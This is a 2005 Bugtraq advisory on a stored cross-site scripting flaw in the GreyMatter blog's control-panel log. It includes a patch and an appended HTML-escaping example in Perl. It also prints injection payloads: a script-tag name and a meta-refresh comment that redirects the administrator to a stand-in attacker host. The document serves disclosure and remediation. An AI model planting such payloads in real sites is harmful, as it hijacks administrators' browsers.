Date: Wed, 31 Aug 2005 12:58:35 +0400 (MSD)
From: poizon@...urityinfo.ru
To: bugtraq@...urityfocus.com
Subject: XSS in GreyMatter blog


Greymatter is a Perl-based web blog.
Official site: http://www.greymatterforums.com/
GM analyzes posted comments, and if a post contains dangerous code (like
<script></script>), the administrator gets a message about it in the log
files. The log files contain not only the message but also the dangerous code.
When the admin views the log files (Admin panel Options: "View Control Panel
Log"), the code executes in the admin's browser.
Example attack:
Add a comment:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>

The admin then can't open the "View Control Panel Log" menu, because this
page redirects to the attacker's site.
Solution:
Edit gm-library.cgi like this:
-----------------------------------------------------------
# Read the control panel log into memory.
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);

foreach $gmlogfileline (@gmlogfile) {
        chomp ($gmlogfileline);
        # Protect the markup the log itself uses with placeholders.
        $gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
        $gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
        $gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
        $gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
        # Replace every remaining angle bracket (raw or entity-encoded) with #.
        $gmlogfileline=~s/<|>|&lt;|&gt;/#/ig;
        # Restore the protected markup.
        $gmlogfileline=~s/#BOLD_OPEN#/<b>/ig;
        $gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/ig;
        $gmlogfileline=~s/#FONT_OPEN#/<font size="1">/g;
        $gmlogfileline=~s/#FONT_CLOSED#/<\/font>/ig;
        print "$gmlogfileline<BR>";
}
print qq(<font size="1">All danger tags replace with # symbol</font><BR>);
-------------------------------------------------------
Sorry for my English; it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru
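
Added example, not part of the original post or of Greymatter's own code: an alternative to replacing brackets with #, which HTML-encodes each log line on output and then restores only the four tags the patch above preserves. The log line format and the sample entries are constructed for illustration, and html_escape and render_log_line are hypothetical names.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Encode every HTML metacharacter. '&' goes first so the entities produced
# for the other characters are not encoded a second time.
sub html_escape {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#39;/g;
    return $text;
}

# Markup assumed to be written by the log itself (the tags kept by the patch
# above), keyed by its escaped, lower-case form.
my %allowed = (
    '&lt;b&gt;'                       => '<b>',
    '&lt;/b&gt;'                      => '</b>',
    '&lt;font size=&quot;1&quot;&gt;' => '<font size="1">',
    '&lt;/font&gt;'                   => '</font>',
);
my $allowed_re = join '|', map { quotemeta } keys %allowed;

# Escape the whole line, then turn back only exact matches of allowed tags.
sub render_log_line {
    my ($line) = @_;
    my $safe = html_escape($line);
    $safe =~ s/($allowed_re)/$allowed{lc $1}/gie;
    return $safe;
}

# Constructed sample log lines; the payloads are the ones from the post.
my @sample = (
    q{<b>08/31/05 12:58</b> <font size="1">Comment added by Alice</font>},
    q{<b>08/31/05 12:59</b> Comment added by <script>alert('XSS')</script>},
    q{<meta http-equiv="refresh" content="0; url=http://site_with_danger_content.evil"/>},
);
print render_log_line($_), "<BR>\n" for @sample;
```

The script and meta payloads come out as visible text (&lt;script&gt;..., &lt;meta ...) that the browser does not interpret, while the log's own bold and font markup still renders.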
